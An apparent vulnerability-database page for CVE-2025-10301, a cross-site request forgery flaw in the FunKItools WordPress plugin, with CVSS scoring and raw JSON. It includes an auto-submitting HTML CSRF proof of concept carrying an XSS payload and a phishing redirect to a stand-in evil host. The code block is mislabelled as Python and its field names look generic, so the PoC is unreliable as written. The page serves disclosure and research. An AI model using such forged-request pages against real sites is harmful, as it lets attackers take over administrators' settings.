Security Vulnerability Report
中文
CVE-2025-10301 CVSS 4.3 MEDIUM

CVE-2025-10301

Published: 2025-10-15 09:15:40
Last Modified: 2026-04-15 00:35:42

Description

The FunKItools plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the saveFields() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FunKItools <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-10301: FunKItools WordPress Plugin CSRF PoC Vulnerability: Missing nonce validation in saveFields() function Affected: FunKItools <= 1.0.2 --> <html> <head> <title>Loading...</title> </head> <body> <!-- CSRF exploit form targeting the vulnerable saveFields() function --> <form action="http://target-wordpress-site.com/wp-admin/admin.php?page=funkitools-options" method="POST" id="csrf-form"> <!-- Malicious settings to overwrite plugin configuration --> <input type="hidden" name="action" value="saveFields" /> <input type="hidden" name="option[malicious_setting_1]" value="attacker_controlled_value" /> <input type="hidden" name="option[malicious_setting_2]" value="<script>alert('XSS')</script>" /> <input type="hidden" name="option[redirect_url]" value="http://evil-site.com/phishing" /> <input type="submit" value="Click here to continue" /> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10301", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:39.610", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FunKItools plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the saveFields() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/funkitools/trunk/includes/controllers/options/page.php#L59", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/36231136-58ec-4a6d-8cfc-d3d69c31037d?source=cve", "source": "[email protected]"}]}}